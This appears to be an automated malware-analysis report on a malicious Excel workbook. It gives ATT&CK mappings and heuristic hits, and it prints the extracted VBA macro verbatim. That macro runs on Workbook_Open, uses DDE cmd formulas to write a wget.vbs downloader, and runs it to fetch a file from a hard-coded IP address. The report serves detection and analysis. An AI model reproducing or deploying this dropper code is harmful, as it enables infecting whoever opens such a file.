MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The OOXML file contains a Workbook_Open VBA macro that leverages a DDE link to execute a command. This command uses 'cscript' to run a downloaded 'wget.vbs' script, which in turn downloads a file from 'http://180.148.84.85/test.txt' and saves it as 'test.txt'. This indicates a downloader or droppper functionality, aiming to fetch and execute further malicious content.
Heuristics 6
-
Spreadsheet DDE link launches a dangerous command critical OOXML_SPREADSHEET_DDE_MALICIOUSExcel workbook contains an externalLinks/ddeLink entry whose ddeService/ddeTopic launches a dangerous executable. This is SpreadsheetML DDE command execution, distinct from WordprocessingML DDE field instructions.
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs && echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs && echo Err.Clear >> wget.vbs'!'A1'" ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set http = Nothing >> wget.vbs && echo Set http = CreateObject(""WinHttp.WinHttpRequest.5.1"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""WinHttp.WinHttpRequest"") >> wget.vbs'!'A1'" ActiveCell.FormulaR1C1 = "=cmd|'/C echo If http Is Nothing Then Set http = CreateObject(""MSXML2.ServerXMLHTTP"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""Microsoft.XMLHTTP"") >> wget.vbs'!'A1'" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Name = "Module1" Private Sub Workbook_Open() Attribute Workbook_Open.VB_ProcData.VB_Invoke_Func = "j\n14" -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://180.148.84.85/test.txt In document text (OOXML body / shared strings)
- http:///test.txtIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2988 bytes |
SHA-256: 80da8d74fcfa3746c365a0e52a5a33a192e830c0fdf876fefcc4add1fa699ecc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Private Sub Workbook_Open()
Attribute Workbook_Open.VB_ProcData.VB_Invoke_Func = "j\n14"
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
ActiveCell.FormulaR1C1 = "=cmd|'/C echo strUrl = WScript.Arguments.Item(0) > wget.vbs && echo StrFile = WScript.Arguments.Item(1) >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs && echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs && echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs && echo Err.Clear >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set http = Nothing >> wget.vbs && echo Set http = CreateObject(""WinHttp.WinHttpRequest.5.1"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""WinHttp.WinHttpRequest"") >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo If http Is Nothing Then Set http = CreateObject(""MSXML2.ServerXMLHTTP"") >> wget.vbs && echo If http Is Nothing Then Set http = CreateObject(""Microsoft.XMLHTTP"") >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo http.Open ""GET"",strURL,False >> wget.vbs && echo http.Send >> wget.vbs && echo varByteArray = http.ResponseBody >> wget.vbs && echo Set http = Nothing >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo Set fs = CreateObject(""Scripting.FileSystemObject"") >> wget.vbs && echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs && echo strData = "" >> wget.vbs && echo strBuffer = "" >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs && echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs && echo Next >> wget.vbs && echo ts.Close >> wget.vbs'!'A1'"
ActiveCell.FormulaR1C1 = "=cmd|'/C cscript wget.vbs http:///test.txt test.txt '!'A1'"
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Sub test()
Attribute test.VB_ProcData.VB_Invoke_Func = "j\n14"
s
End Sub
Attribute VB_Name = "Module3"
Sub testest()
Attribute testest.VB_ProcData.VB_Invoke_Func = " \n14"
'
' testest Macro
'
'
Range("J18").Select
ActiveCell.FormulaR1C1 = "asd"
Range("K18").Select
ActiveCell.FormulaR1C1 = "asd"
Range("K19").Select
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 41984 bytes |
SHA-256: d4d745a79c0fba985ce214a37a687b93ca88b7754d42146d23f219cd68fa5c9d |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.